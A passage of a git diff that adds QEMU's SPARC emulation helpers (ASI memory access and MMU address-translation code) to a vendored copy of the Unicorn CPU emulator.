4, 0); + } else if (rd < 8) { + env->gregs[rd] = helper_ld_asi(env, addr, asi, 4, 0); + env->gregs[rd + 1] = helper_ld_asi(env, addr + 4, asi, 4, 0); + } else { + env->regwptr[rd] = helper_ld_asi(env, addr, asi, 4, 0); + env->regwptr[rd + 1] = helper_ld_asi(env, addr + 4, asi, 4, 0); + } + break; + } +} + +void helper_ldf_asi(CPUSPARCState *env, target_ulong addr, int asi, int size, + int rd) +{ + unsigned int i; + target_ulong val; + + helper_check_align(env, addr, 3); + addr = asi_address_mask(env, asi, addr); + + switch (asi) { + case 0xf0: /* UA2007/JPS1 Block load primary */ + case 0xf1: /* UA2007/JPS1 Block load secondary */ + case 0xf8: /* UA2007/JPS1 Block load primary LE */ + case 0xf9: /* UA2007/JPS1 Block load secondary LE */ + if (rd & 7) { + helper_raise_exception(env, TT_ILL_INSN); + return; + } + helper_check_align(env, addr, 0x3f); + for (i = 0; i < 8; i++, rd += 2, addr += 8) { + env->fpr[rd / 2].ll = helper_ld_asi(env, addr, asi & 0x8f, 8, 0); + } + return; + + case 0x16: /* UA2007 Block load primary, user privilege */ + case 0x17: /* UA2007 Block load secondary, user privilege */ + case 0x1e: /* UA2007 Block load primary LE, user privilege */ + case 0x1f: /* UA2007 Block load secondary LE, user privilege */ + case 0x70: /* JPS1 Block load primary, user privilege */ + case 0x71: /* JPS1 Block load secondary, user privilege */ + case 0x78: /* JPS1 Block load primary LE, user privilege */ + case 0x79: /* JPS1 Block load secondary LE, user privilege */ + if (rd & 7) { + helper_raise_exception(env, TT_ILL_INSN); + return; + } + helper_check_align(env, addr, 0x3f); + for (i = 0; i < 8; i++, rd += 2, addr += 8) { + env->fpr[rd / 2].ll = helper_ld_asi(env, addr, asi & 0x19, 8, 0); + } + return; + + default: + break; + } + + switch (size) { + default: + case 4: + val = helper_ld_asi(env, addr, asi, size, 0); + if (rd & 1) { + env->fpr[rd / 2].l.lower = val; + } else { + env->fpr[rd / 2].l.upper = val; + } + break; + case 8: + env->fpr[rd / 2].ll = 
helper_ld_asi(env, addr, asi, size, 0); + break; + case 16: + env->fpr[rd / 2].ll = helper_ld_asi(env, addr, asi, 8, 0); + env->fpr[rd / 2 + 1].ll = helper_ld_asi(env, addr + 8, asi, 8, 0); + break; + } +} + +void helper_stf_asi(CPUSPARCState *env, target_ulong addr, int asi, int size, + int rd) +{ + unsigned int i; + target_ulong val; + + addr = asi_address_mask(env, asi, addr); + + switch (asi) { + case 0xe0: /* UA2007/JPS1 Block commit store primary (cache flush) */ + case 0xe1: /* UA2007/JPS1 Block commit store secondary (cache flush) */ + case 0xf0: /* UA2007/JPS1 Block store primary */ + case 0xf1: /* UA2007/JPS1 Block store secondary */ + case 0xf8: /* UA2007/JPS1 Block store primary LE */ + case 0xf9: /* UA2007/JPS1 Block store secondary LE */ + if (rd & 7) { + helper_raise_exception(env, TT_ILL_INSN); + return; + } + helper_check_align(env, addr, 0x3f); + for (i = 0; i < 8; i++, rd += 2, addr += 8) { + helper_st_asi(env, addr, env->fpr[rd / 2].ll, asi & 0x8f, 8); + } + + return; + case 0x16: /* UA2007 Block load primary, user privilege */ + case 0x17: /* UA2007 Block load secondary, user privilege */ + case 0x1e: /* UA2007 Block load primary LE, user privilege */ + case 0x1f: /* UA2007 Block load secondary LE, user privilege */ + case 0x70: /* JPS1 Block store primary, user privilege */ + case 0x71: /* JPS1 Block store secondary, user privilege */ + case 0x78: /* JPS1 Block load primary LE, user privilege */ + case 0x79: /* JPS1 Block load secondary LE, user privilege */ + if (rd & 7) { + helper_raise_exception(env, TT_ILL_INSN); + return; + } + helper_check_align(env, addr, 0x3f); + for (i = 0; i < 8; i++, rd += 2, addr += 8) { + helper_st_asi(env, addr, env->fpr[rd / 2].ll, asi & 0x19, 8); + } + + return; + case 0xd2: /* 16-bit floating point load primary */ + case 0xd3: /* 16-bit floating point load secondary */ + case 0xda: /* 16-bit floating point load primary, LE */ + case 0xdb: /* 16-bit floating point load secondary, LE */ + helper_check_align(env, 
addr, 1); + /* Fall through */ + case 0xd0: /* 8-bit floating point load primary */ + case 0xd1: /* 8-bit floating point load secondary */ + case 0xd8: /* 8-bit floating point load primary, LE */ + case 0xd9: /* 8-bit floating point load secondary, LE */ + val = env->fpr[rd / 2].l.lower; + helper_st_asi(env, addr, val, asi & 0x8d, ((asi & 2) >> 1) + 1); + return; + default: + helper_check_align(env, addr, 3); + break; + } + + switch (size) { + default: + case 4: + if (rd & 1) { + val = env->fpr[rd / 2].l.lower; + } else { + val = env->fpr[rd / 2].l.upper; + } + helper_st_asi(env, addr, val, asi, size); + break; + case 8: + helper_st_asi(env, addr, env->fpr[rd / 2].ll, asi, size); + break; + case 16: + helper_st_asi(env, addr, env->fpr[rd / 2].ll, asi, 8); + helper_st_asi(env, addr + 8, env->fpr[rd / 2 + 1].ll, asi, 8); + break; + } +} + +target_ulong helper_casx_asi(CPUSPARCState *env, target_ulong addr, + target_ulong val1, target_ulong val2, + uint32_t asi) +{ + target_ulong ret; + + ret = helper_ld_asi(env, addr, asi, 8, 0); + if (val2 == ret) { + helper_st_asi(env, addr, val1, asi, 8); + } + return ret; +} +#endif /* TARGET_SPARC64 */ + +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) +target_ulong helper_cas_asi(CPUSPARCState *env, target_ulong addr, + target_ulong val1, target_ulong val2, uint32_t asi) +{ + target_ulong ret; + + val2 &= 0xffffffffUL; + ret = helper_ld_asi(env, addr, asi, 4, 0); + ret &= 0xffffffffUL; + if (val2 == ret) { + helper_st_asi(env, addr, val1 & 0xffffffffUL, asi, 4); + } + return ret; +} +#endif /* !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) */ + +void helper_ldqf(CPUSPARCState *env, target_ulong addr, int mem_idx) +{ + /* XXX add 128 bit load */ + CPU_QuadU u; + + helper_check_align(env, addr, 7); +#if !defined(CONFIG_USER_ONLY) + switch (mem_idx) { + case MMU_USER_IDX: + u.ll.upper = cpu_ldq_user(env, addr); + u.ll.lower = cpu_ldq_user(env, addr + 8); + QT0 = u.q; + break; + case MMU_KERNEL_IDX: + u.ll.upper = 
cpu_ldq_kernel(env, addr); + u.ll.lower = cpu_ldq_kernel(env, addr + 8); + QT0 = u.q; + break; +#ifdef TARGET_SPARC64 + case MMU_HYPV_IDX: + u.ll.upper = cpu_ldq_hypv(env, addr); + u.ll.lower = cpu_ldq_hypv(env, addr + 8); + QT0 = u.q; + break; +#endif + default: + DPRINTF_MMU("helper_ldqf: need to check MMU idx %d\n", mem_idx); + break; + } +#else + u.ll.upper = ldq_raw(address_mask(env, addr)); + u.ll.lower = ldq_raw(address_mask(env, addr + 8)); + QT0 = u.q; +#endif +} + +void helper_stqf(CPUSPARCState *env, target_ulong addr, int mem_idx) +{ + /* XXX add 128 bit store */ + CPU_QuadU u; + + helper_check_align(env, addr, 7); +#if !defined(CONFIG_USER_ONLY) + switch (mem_idx) { + case MMU_USER_IDX: + u.q = QT0; + cpu_stq_user(env, addr, u.ll.upper); + cpu_stq_user(env, addr + 8, u.ll.lower); + break; + case MMU_KERNEL_IDX: + u.q = QT0; + cpu_stq_kernel(env, addr, u.ll.upper); + cpu_stq_kernel(env, addr + 8, u.ll.lower); + break; +#ifdef TARGET_SPARC64 + case MMU_HYPV_IDX: + u.q = QT0; + cpu_stq_hypv(env, addr, u.ll.upper); + cpu_stq_hypv(env, addr + 8, u.ll.lower); + break; +#endif + default: + DPRINTF_MMU("helper_stqf: need to check MMU idx %d\n", mem_idx); + break; + } +#else + u.q = QT0; + stq_raw(address_mask(env, addr), u.ll.upper); + stq_raw(address_mask(env, addr + 8), u.ll.lower); +#endif +} + +#if !defined(CONFIG_USER_ONLY) +#ifndef TARGET_SPARC64 +void sparc_cpu_unassigned_access(CPUState *cs, hwaddr addr, + bool is_write, bool is_exec, int is_asi, + unsigned size) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + int fault_type; + +#ifdef DEBUG_UNASSIGNED + if (is_asi) { + printf("Unassigned mem %s access of %d byte%s to " TARGET_FMT_plx + " asi 0x%02x from " TARGET_FMT_lx "\n", + is_exec ? "exec" : is_write ? "write" : "read", size, + size == 1 ? "" : "s", addr, is_asi, env->pc); + } else { + printf("Unassigned mem %s access of %d byte%s to " TARGET_FMT_plx + " from " TARGET_FMT_lx "\n", + is_exec ? "exec" : is_write ? 
"write" : "read", size, + size == 1 ? "" : "s", addr, env->pc); + } +#endif + /* Don't overwrite translation and access faults */ + fault_type = (env->mmuregs[3] & 0x1c) >> 2; + if ((fault_type > 4) || (fault_type == 0)) { + env->mmuregs[3] = 0; /* Fault status register */ + if (is_asi) { + env->mmuregs[3] |= 1 << 16; + } + if (env->psrs) { + env->mmuregs[3] |= 1 << 5; + } + if (is_exec) { + env->mmuregs[3] |= 1 << 6; + } + if (is_write) { + env->mmuregs[3] |= 1 << 7; + } + env->mmuregs[3] |= (5 << 2) | 2; + /* SuperSPARC will never place instruction fault addresses in the FAR */ + if (!is_exec) { + env->mmuregs[4] = addr; /* Fault address register */ + } + } + /* overflow (same type fault was not read before another fault) */ + if (fault_type == ((env->mmuregs[3] & 0x1c)) >> 2) { + env->mmuregs[3] |= 1; + } + + if ((env->mmuregs[0] & MMU_E) && !(env->mmuregs[0] & MMU_NF)) { + if (is_exec) { + helper_raise_exception(env, TT_CODE_ACCESS); + } else { + helper_raise_exception(env, TT_DATA_ACCESS); + } + } + + /* flush neverland mappings created during no-fault mode, + so the sequential MMU faults report proper fault types */ + if (env->mmuregs[0] & MMU_NF) { + tlb_flush(cs, 1); + } +} +#else +void sparc_cpu_unassigned_access(CPUState *cs, hwaddr addr, + bool is_write, bool is_exec, int is_asi, + unsigned size) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + +#ifdef DEBUG_UNASSIGNED + printf("Unassigned mem access to " TARGET_FMT_plx " from " TARGET_FMT_lx + "\n", addr, env->pc); +#endif + + if (is_exec) { + helper_raise_exception(env, TT_CODE_ACCESS); + } else { + helper_raise_exception(env, TT_DATA_ACCESS); + } +} +#endif +#endif + +#if !defined(CONFIG_USER_ONLY) +void QEMU_NORETURN sparc_cpu_do_unaligned_access(CPUState *cs, + vaddr addr, int is_write, + int is_user, uintptr_t retaddr) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + +#ifdef DEBUG_UNALIGNED + printf("Unaligned access to 0x" TARGET_FMT_lx 
" from 0x" TARGET_FMT_lx + "\n", addr, env->pc); +#endif + if (retaddr) { + cpu_restore_state(CPU(cpu), retaddr); + } + helper_raise_exception(env, TT_UNALIGNED); +} + +/* try to fill the TLB and return an exception if error. If retaddr is + NULL, it means that the function was called in C code (i.e. not + from generated code or from helper.c) */ +/* XXX: fix it to restore all registers */ +void tlb_fill(CPUState *cs, target_ulong addr, int is_write, int mmu_idx, + uintptr_t retaddr) +{ + int ret; + + ret = sparc_cpu_handle_mmu_fault(cs, addr, is_write, mmu_idx); + if (ret) { + if (retaddr) { + cpu_restore_state(cs, retaddr); + } + cpu_loop_exit(cs); + } +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/mmu_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/mmu_helper.c new file mode 100644 index 0000000..9c3b2ce --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/mmu_helper.c @@ -0,0 +1,867 @@ +/* + * Sparc MMU helpers + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ + +#include "cpu.h" +#include "exec/address-spaces.h" + +/* Sparc MMU emulation */ + +#if defined(CONFIG_USER_ONLY) + +int sparc_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + if (rw & 2) { + cs->exception_index = TT_TFAULT; + } else { + cs->exception_index = TT_DFAULT; + } + return 1; +} + +#else + +#ifndef TARGET_SPARC64 +/* + * Sparc V8 Reference MMU (SRMMU) + */ +static const int access_table[8][8] = { + { 0, 0, 0, 0, 8, 0, 12, 12 }, + { 0, 0, 0, 0, 8, 0, 0, 0 }, + { 8, 8, 0, 0, 0, 8, 12, 12 }, + { 8, 8, 0, 0, 0, 8, 0, 0 }, + { 8, 0, 8, 0, 8, 8, 12, 12 }, + { 8, 0, 8, 0, 8, 0, 8, 0 }, + { 8, 8, 8, 0, 8, 8, 12, 12 }, + { 8, 8, 8, 0, 8, 8, 8, 0 } +}; + +static const int perm_table[2][8] = { + { + PAGE_READ, + PAGE_READ | PAGE_WRITE, + PAGE_READ | PAGE_EXEC, + PAGE_READ | PAGE_WRITE | PAGE_EXEC, + PAGE_EXEC, + PAGE_READ | PAGE_WRITE, + PAGE_READ | PAGE_EXEC, + PAGE_READ | PAGE_WRITE | PAGE_EXEC + }, + { + PAGE_READ, + PAGE_READ | PAGE_WRITE, + PAGE_READ | PAGE_EXEC, + PAGE_READ | PAGE_WRITE | PAGE_EXEC, + PAGE_EXEC, + PAGE_READ, + 0, + 0, + } +}; + +static int get_physical_address(CPUSPARCState *env, hwaddr *physical, + int *prot, int *access_index, + target_ulong address, int rw, int mmu_idx, + target_ulong *page_size) +{ + int access_perms = 0; + hwaddr pde_ptr; + uint32_t pde; + int error_code = 0, is_dirty, is_user; + unsigned long page_offset; + CPUState *cs = CPU(sparc_env_get_cpu(env)); + + is_user = mmu_idx == MMU_USER_IDX; + + if ((env->mmuregs[0] & MMU_E) == 0) { /* MMU disabled */ + *page_size = TARGET_PAGE_SIZE; + /* Boot mode: instruction fetches are taken from PROM */ + if (rw == 2 && (env->mmuregs[0] & env->def->mmu_bm)) { + *physical = env->prom_addr | (address & 0x7ffffULL); + *prot = PAGE_READ | PAGE_EXEC; + return 0; + } + *physical = address; + *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; + return 0; + } + + *access_index = ((rw & 1) << 2) | (rw & 2) | (is_user ? 
0 : 1); + *physical = 0xffffffffffff0000ULL; + + /* SPARC reference MMU table walk: Context table->L1->L2->PTE */ + /* Context base + context number */ + pde_ptr = (env->mmuregs[1] << 4) + (env->mmuregs[2] << 2); + pde = ldl_phys(cs->as, pde_ptr); + + /* Ctx pde */ + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + return 1 << 2; + case 2: /* L0 PTE, maybe should not happen? */ + case 3: /* Reserved */ + return 4 << 2; + case 1: /* L0 PDE */ + pde_ptr = ((address >> 22) & ~3) + ((pde & ~3) << 4); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + return (1 << 8) | (1 << 2); + case 3: /* Reserved */ + return (1 << 8) | (4 << 2); + case 1: /* L1 PDE */ + pde_ptr = ((address & 0xfc0000) >> 16) + ((pde & ~3) << 4); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + return (2 << 8) | (1 << 2); + case 3: /* Reserved */ + return (2 << 8) | (4 << 2); + case 1: /* L2 PDE */ + pde_ptr = ((address & 0x3f000) >> 10) + ((pde & ~3) << 4); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + return (3 << 8) | (1 << 2); + case 1: /* PDE, should not happen */ + case 3: /* Reserved */ + return (3 << 8) | (4 << 2); + case 2: /* L3 PTE */ + page_offset = 0; + } + *page_size = TARGET_PAGE_SIZE; + break; + case 2: /* L2 PTE */ + page_offset = address & 0x3f000; + *page_size = 0x40000; + } + break; + case 2: /* L1 PTE */ + page_offset = address & 0xfff000; + *page_size = 0x1000000; + } + } + + /* check access */ + access_perms = (pde & PTE_ACCESS_MASK) >> PTE_ACCESS_SHIFT; + error_code = access_table[*access_index][access_perms]; + if (error_code && !((env->mmuregs[0] & MMU_NF) && is_user)) { + return error_code; + } + + /* update page modified and dirty bits */ + is_dirty = (rw & 1) && !(pde & PG_MODIFIED_MASK); + if (!(pde & PG_ACCESSED_MASK) || is_dirty) { + pde |= PG_ACCESSED_MASK; 
+ if (is_dirty) { + pde |= PG_MODIFIED_MASK; + } + stl_phys_notdirty(cs->as, pde_ptr, pde); + } + + /* the page can be put in the TLB */ + *prot = perm_table[is_user][access_perms]; + if (!(pde & PG_MODIFIED_MASK)) { + /* only set write access if already dirty... otherwise wait + for dirty access */ + *prot &= ~PAGE_WRITE; + } + + /* Even if large ptes, we map only one 4KB page in the cache to + avoid filling it too fast */ + *physical = ((hwaddr)(pde & PTE_ADDR_MASK) << 4) + page_offset; + return error_code; +} + +/* Perform address translation */ +int sparc_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + hwaddr paddr; + target_ulong vaddr; + target_ulong page_size; + int error_code = 0, prot, access_index; + + address &= TARGET_PAGE_MASK; + error_code = get_physical_address(env, &paddr, &prot, &access_index, + address, rw, mmu_idx, &page_size); + vaddr = address; + if (error_code == 0) { +#ifdef DEBUG_MMU + printf("Translate at %" VADDR_PRIx " -> " TARGET_FMT_plx ", vaddr " + TARGET_FMT_lx "\n", address, paddr, vaddr); +#endif + tlb_set_page(cs, vaddr, paddr, prot, mmu_idx, page_size); + return 0; + } + + if (env->mmuregs[3]) { /* Fault status register */ + env->mmuregs[3] = 1; /* overflow (not read before another fault) */ + } + env->mmuregs[3] |= (access_index << 5) | error_code | 2; + env->mmuregs[4] = address; /* Fault address register */ + + if ((env->mmuregs[0] & MMU_NF) || env->psret == 0) { + /* No fault mode: if a mapping is available, just override + permissions. If no mapping is available, redirect accesses to + neverland. Fake/overridden mappings will be flushed when + switching to normal mode. 
*/ + prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; + tlb_set_page(cs, vaddr, paddr, prot, mmu_idx, TARGET_PAGE_SIZE); + return 0; + } else { + if (rw & 2) { + cs->exception_index = TT_TFAULT; + } else { + cs->exception_index = TT_DFAULT; + } + return 1; + } +} + +target_ulong mmu_probe(CPUSPARCState *env, target_ulong address, int mmulev) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + hwaddr pde_ptr; + uint32_t pde; + + /* Context base + context number */ + pde_ptr = (hwaddr)(env->mmuregs[1] << 4) + + (env->mmuregs[2] << 2); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + case 2: /* PTE, maybe should not happen? */ + case 3: /* Reserved */ + return 0; + case 1: /* L1 PDE */ + if (mmulev == 3) { + return pde; + } + pde_ptr = ((address >> 22) & ~3) + ((pde & ~3) << 4); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + case 3: /* Reserved */ + return 0; + case 2: /* L1 PTE */ + return pde; + case 1: /* L2 PDE */ + if (mmulev == 2) { + return pde; + } + pde_ptr = ((address & 0xfc0000) >> 16) + ((pde & ~3) << 4); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + case 3: /* Reserved */ + return 0; + case 2: /* L2 PTE */ + return pde; + case 1: /* L3 PDE */ + if (mmulev == 1) { + return pde; + } + pde_ptr = ((address & 0x3f000) >> 10) + ((pde & ~3) << 4); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + case 1: /* PDE, should not happen */ + case 3: /* Reserved */ + return 0; + case 2: /* L3 PTE */ + return pde; + } + } + } + } + return 0; +} + +void dump_mmu(FILE *f, fprintf_function cpu_fprintf, CPUSPARCState *env) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + target_ulong va, va1, va2; + unsigned int n, m, o; + hwaddr pde_ptr, pa; + uint32_t pde; + + pde_ptr = (env->mmuregs[1] << 4) + (env->mmuregs[2] << 2); + pde = 
ldl_phys(cs->as, pde_ptr); + (*cpu_fprintf)(f, "Root ptr: " TARGET_FMT_plx ", ctx: %d\n", + (hwaddr)env->mmuregs[1] << 4, env->mmuregs[2]); + for (n = 0, va = 0; n < 256; n++, va += 16 * 1024 * 1024) { + pde = mmu_probe(env, va, 2); + if (pde) { + pa = cpu_get_phys_page_debug(cs, va); + (*cpu_fprintf)(f, "VA: " TARGET_FMT_lx ", PA: " TARGET_FMT_plx + " PDE: " TARGET_FMT_lx "\n", va, pa, pde); + for (m = 0, va1 = va; m < 64; m++, va1 += 256 * 1024) { + pde = mmu_probe(env, va1, 1); + if (pde) { + pa = cpu_get_phys_page_debug(cs, va1); + (*cpu_fprintf)(f, " VA: " TARGET_FMT_lx ", PA: " + TARGET_FMT_plx " PDE: " TARGET_FMT_lx "\n", + va1, pa, pde); + for (o = 0, va2 = va1; o < 64; o++, va2 += 4 * 1024) { + pde = mmu_probe(env, va2, 0); + if (pde) { + pa = cpu_get_phys_page_debug(cs, va2); + (*cpu_fprintf)(f, " VA: " TARGET_FMT_lx ", PA: " + TARGET_FMT_plx " PTE: " + TARGET_FMT_lx "\n", + va2, pa, pde); + } + } + } + } + } + } +} + +/* Gdb expects all registers windows to be flushed in ram. This function handles + * reads (and only reads) in stack frames as if windows were flushed. We assume + * that the sparc ABI is followed. + */ +int sparc_cpu_memory_rw_debug(CPUState *cs, vaddr address, + uint8_t *buf, int len, bool is_write) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + target_ulong addr = address; + int i; + int len1; + int cwp = env->cwp; + + if (!is_write) { + for (i = 0; i < env->nwindows; i++) { + int off; + target_ulong fp = env->regbase[cwp * 16 + 22]; + + /* Assume fp == 0 means end of frame. */ + if (fp == 0) { + break; + } + + cwp = cpu_cwp_inc(env, cwp + 1); + + /* Invalid window ? */ + if (env->wim & (1 << cwp)) { + break; + } + + /* According to the ABI, the stack is growing downward. */ + if (addr + len < fp) { + break; + } + + /* Not in this frame. */ + if (addr > fp + 64) { + continue; + } + + /* Handle access before this window. 
*/ + if (addr < fp) { + len1 = fp - addr; + if (cpu_memory_rw_debug(cs, addr, buf, len1, is_write) != 0) { + return -1; + } + addr += len1; + len -= len1; + buf += len1; + } + + /* Access byte per byte to registers. Not very efficient but speed + * is not critical. + */ + off = addr - fp; + len1 = 64 - off; + + if (len1 > len) { + len1 = len; + } + + for (; len1; len1--) { + int reg = cwp * 16 + 8 + (off >> 2); + union { + uint32_t v; + uint8_t c[4]; + } u; + u.v = cpu_to_be32(env->regbase[reg]); + *buf++ = u.c[off & 3]; + addr++; + len--; + off++; + } + + if (len == 0) { + return 0; + } + } + } + return cpu_memory_rw_debug(cs, addr, buf, len, is_write); +} + +#else /* !TARGET_SPARC64 */ + +/* 41 bit physical address space */ +static inline hwaddr ultrasparc_truncate_physical(uint64_t x) +{ + return x & 0x1ffffffffffULL; +} + +/* + * UltraSparc IIi I/DMMUs + */ + +/* Returns true if TTE tag is valid and matches virtual address value + in context requires virtual address mask value calculated from TTE + entry size */ +static inline int ultrasparc_tag_match(SparcTLBEntry *tlb, + uint64_t address, uint64_t context, + hwaddr *physical) +{ + uint64_t mask; + + switch (TTE_PGSIZE(tlb->tte)) { + default: + case 0x0: /* 8k */ + mask = 0xffffffffffffe000ULL; + break; + case 0x1: /* 64k */ + mask = 0xffffffffffff0000ULL; + break; + case 0x2: /* 512k */ + mask = 0xfffffffffff80000ULL; + break; + case 0x3: /* 4M */ + mask = 0xffffffffffc00000ULL; + break; + } + + /* valid, context match, virtual address match? 
*/ + if (TTE_IS_VALID(tlb->tte) && + (TTE_IS_GLOBAL(tlb->tte) || tlb_compare_context(tlb, context)) + && compare_masked(address, tlb->tag, mask)) { + /* decode physical address */ + *physical = ((tlb->tte & mask) | (address & ~mask)) & 0x1ffffffe000ULL; + return 1; + } + + return 0; +} + +static int get_physical_address_data(CPUSPARCState *env, + hwaddr *physical, int *prot, + target_ulong address, int rw, int mmu_idx) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + unsigned int i; + uint64_t context; + uint64_t sfsr = 0; + + int is_user = (mmu_idx == MMU_USER_IDX || + mmu_idx == MMU_USER_SECONDARY_IDX); + + if ((env->lsu & DMMU_E) == 0) { /* DMMU disabled */ + *physical = ultrasparc_truncate_physical(address); + *prot = PAGE_READ | PAGE_WRITE; + return 0; + } + + switch (mmu_idx) { + case MMU_USER_IDX: + case MMU_KERNEL_IDX: + context = env->dmmu.mmu_primary_context & 0x1fff; + sfsr |= SFSR_CT_PRIMARY; + break; + case MMU_USER_SECONDARY_IDX: + case MMU_KERNEL_SECONDARY_IDX: + context = env->dmmu.mmu_secondary_context & 0x1fff; + sfsr |= SFSR_CT_SECONDARY; + break; + case MMU_NUCLEUS_IDX: + sfsr |= SFSR_CT_NUCLEUS; + /* FALLTHRU */ + default: + context = 0; + break; + } + + if (rw == 1) { + sfsr |= SFSR_WRITE_BIT; + } else if (rw == 4) { + sfsr |= SFSR_NF_BIT; + } + + for (i = 0; i < 64; i++) { + /* ctx match, vaddr match, valid? */ + if (ultrasparc_tag_match(&env->dtlb[i], address, context, physical)) { + int do_fault = 0; + + /* access ok? */ + /* multiple bits in SFSR.FT may be set on TT_DFAULT */ + if (TTE_IS_PRIV(env->dtlb[i].tte) && is_user) { + do_fault = 1; + sfsr |= SFSR_FT_PRIV_BIT; /* privilege violation */ + //trace_mmu_helper_dfault(address, context, mmu_idx, env->tl); + } + if (rw == 4) { + if (TTE_IS_SIDEEFFECT(env->dtlb[i].tte)) { + do_fault = 1; + sfsr |= SFSR_FT_NF_E_BIT; + } + } else { + if (TTE_IS_NFO(env->dtlb[i].tte)) { + do_fault = 1; + sfsr |= SFSR_FT_NFO_BIT; + } + } + + if (do_fault) { + /* faults above are reported with TT_DFAULT. 
*/ + cs->exception_index = TT_DFAULT; + } else if (!TTE_IS_W_OK(env->dtlb[i].tte) && (rw == 1)) { + do_fault = 1; + cs->exception_index = TT_DPROT; + + //trace_mmu_helper_dprot(address, context, mmu_idx, env->tl); + } + + if (!do_fault) { + *prot = PAGE_READ; + if (TTE_IS_W_OK(env->dtlb[i].tte)) { + *prot |= PAGE_WRITE; + } + + TTE_SET_USED(env->dtlb[i].tte); + + return 0; + } + + if (env->dmmu.sfsr & SFSR_VALID_BIT) { /* Fault status register */ + sfsr |= SFSR_OW_BIT; /* overflow (not read before + another fault) */ + } + + if (env->pstate & PS_PRIV) { + sfsr |= SFSR_PR_BIT; + } + + /* FIXME: ASI field in SFSR must be set */ + env->dmmu.sfsr = sfsr | SFSR_VALID_BIT; + + env->dmmu.sfar = address; /* Fault address register */ + + env->dmmu.tag_access = (address & ~0x1fffULL) | context; + + return 1; + } + } + + //trace_mmu_helper_dmiss(address, context); + + /* + * On MMU misses: + * - UltraSPARC IIi: SFSR and SFAR unmodified + * - JPS1: SFAR updated and some fields of SFSR updated + */ + env->dmmu.tag_access = (address & ~0x1fffULL) | context; + cs->exception_index = TT_DMISS; + return 1; +} + +static int get_physical_address_code(CPUSPARCState *env, + hwaddr *physical, int *prot, + target_ulong address, int mmu_idx) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + unsigned int i; + uint64_t context; + + int is_user = (mmu_idx == MMU_USER_IDX || + mmu_idx == MMU_USER_SECONDARY_IDX); + + if ((env->lsu & IMMU_E) == 0 || (env->pstate & PS_RED) != 0) { + /* IMMU disabled */ + *physical = ultrasparc_truncate_physical(address); + *prot = PAGE_EXEC; + return 0; + } + + if (env->tl == 0) { + /* PRIMARY context */ + context = env->dmmu.mmu_primary_context & 0x1fff; + } else { + /* NUCLEUS context */ + context = 0; + } + + for (i = 0; i < 64; i++) { + /* ctx match, vaddr match, valid? */ + if (ultrasparc_tag_match(&env->itlb[i], + address, context, physical)) { + /* access ok? 
*/ + if (TTE_IS_PRIV(env->itlb[i].tte) && is_user) { + /* Fault status register */ + if (env->immu.sfsr & SFSR_VALID_BIT) { + env->immu.sfsr = SFSR_OW_BIT; /* overflow (not read before + another fault) */ + } else { + env->immu.sfsr = 0; + } + if (env->pstate & PS_PRIV) { + env->immu.sfsr |= SFSR_PR_BIT; + } + if (env->tl > 0) { + env->immu.sfsr |= SFSR_CT_NUCLEUS; + } + + /* FIXME: ASI field in SFSR must be set */ + env->immu.sfsr |= SFSR_FT_PRIV_BIT | SFSR_VALID_BIT; + cs->exception_index = TT_TFAULT; + + env->immu.tag_access = (address & ~0x1fffULL) | context; + + //trace_mmu_helper_tfault(address, context); + + return 1; + } + *prot = PAGE_EXEC; + TTE_SET_USED(env->itlb[i].tte); + return 0; + } + } + + //trace_mmu_helper_tmiss(address, context); + + /* Context is stored in DMMU (dmmuregs[1]) also for IMMU */ + env->immu.tag_access = (address & ~0x1fffULL) | context; + cs->exception_index = TT_TMISS; + return 1; +} + +static int get_physical_address(CPUSPARCState *env, hwaddr *physical, + int *prot, int *access_index, + target_ulong address, int rw, int mmu_idx, + target_ulong *page_size) +{ + /* ??? We treat everything as a small page, then explicitly flush + everything when an entry is evicted. 
